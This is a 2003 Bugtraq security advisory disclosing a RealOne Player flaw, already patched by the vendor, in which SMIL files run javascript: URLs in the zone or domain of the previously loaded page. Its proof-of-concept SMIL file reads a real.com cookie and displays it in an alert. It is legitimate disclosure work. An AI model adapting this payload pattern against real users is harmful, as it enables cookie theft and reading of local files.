RealOne Player Allows Cross Zone and Domain Access

• Previous message: Slackware Security Team: "[slackware-security] GDM security update (SSA:2003-236-01)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Wed, 27 Aug 2003 12:44:11 -0500 (EST)
To: bugtraq@securityfocus.com

DigitalPranksters Security Advisory
http://www.DigitalPranksters.com

RealOne Player Allows Cross Zone and Domain Access

Risk: High

Product: RealOne Player (English only), RealOne Player v2 for Windows (all
languages), and RealOne Enterprise Desktop (all versions, standalone and
as configured by RealOne Desktop Manager).

Product URL: http://www.real.com/realoneplayer.html

Vendor Contacted: July 1, 2003

Vendor Released Patch: August 19, 2003

DigitalPranksters Public Advisory Released: August 27, 2003

Found by: KrazySnake (krazysnake@digitalpranksters.com)

Problem:
Using a SMIL presentation, an attacker can instruct the RealOne player to
load a series of URLs. If the attacker specifies a scripting protocol as
the URL, the script executes in the context of the previous URL. This
allows the attacker access to everything the previous URL had access to.
For example, an attacker could load a file on the local machine (C: drive)
through the SMIL and then load script into the "my computer" zone to read
content from the local hard disk. It also allows the attack to script web
sites and steal cookies.
We feel this is a high risk because there is no prompt before opening a
SMIL file. This allows the attacker to open the maliciously created file
without the victim's intent. We have identified several potential attack
vectors. These include linking to the SMIL over HTTP through link (A
HREF="malicious.smil"), javascript (document.location="malicious.smil"),
and email attachments.

Proof of concept:
We have created a SMIL file that will read the cookie from
https://order.real.com/pt/order.html. The cookie will be read 9 seconds
after the audio has begun.

Source Code:
<smil xmlns="http://www.w3.org/2001/SMIL20/Language"
xmlns:rn="http://features.real.com/2001/SMIL20/Extensions">
 <head>
  <meta name="title" content="DigitalPranksters.com Proof of Concept"/>
  <meta name="author" content="DigitalPranksters.com"/>
  <meta name="copyright" content="(c)2003 DigitalPranksters.com"/>
 </head>
 <body>
  <audio
src="http://radio.real.com/RGX/def.def...RGX/www.smgradio.com/core/audio/real/live.ram?service=vr">
   <area href="https://order.real.com/pt/order.html" begin="1s"
external="true" actuate="onLoad" sourcePlaystate="play"
rn:sendTo="_rpcontextwin">
    <rn:param name="width" value="10"/>
    <rn:param name="height" value="10"/>
   </area>
   <area href="javascript:alert('Hi there! I\'m a digital prankster. I
just read your cookie from ' + document.domain + ' over the ' +
location.protocol + '// protocol.\n\nThe value was:\n' + document.cookie +
'\n\nHave a nice day.')" begin="9s" external="true" actuate="onLoad"
sourcePlaystate="play" rn:sendTo="_rpcontextwin"/>
  </audio>
 </body>
</smil>

Resolution:
RealNetworks released a security update to address this issue. The
security update and details of this update from RealNetworks are available
from
http://service.real.com/help/faq/security/securityupdate_august2003.html.

Greetings:
Harmo and HTMLBCat.
Thanks to RealNetworks for fixing this issue.

Disclaimer:
Standard disclaimer applies. The opinions expressed in this advisory are
our own and not of any company. The information within this advisory may
change without notice. Use of this information constitutes acceptance for
use in an AS IS condition. There are no warranties with regard to this
information. In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.

• Previous message: Slackware Security Team: "[slackware-security] GDM security update (SSA:2003-236-01)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]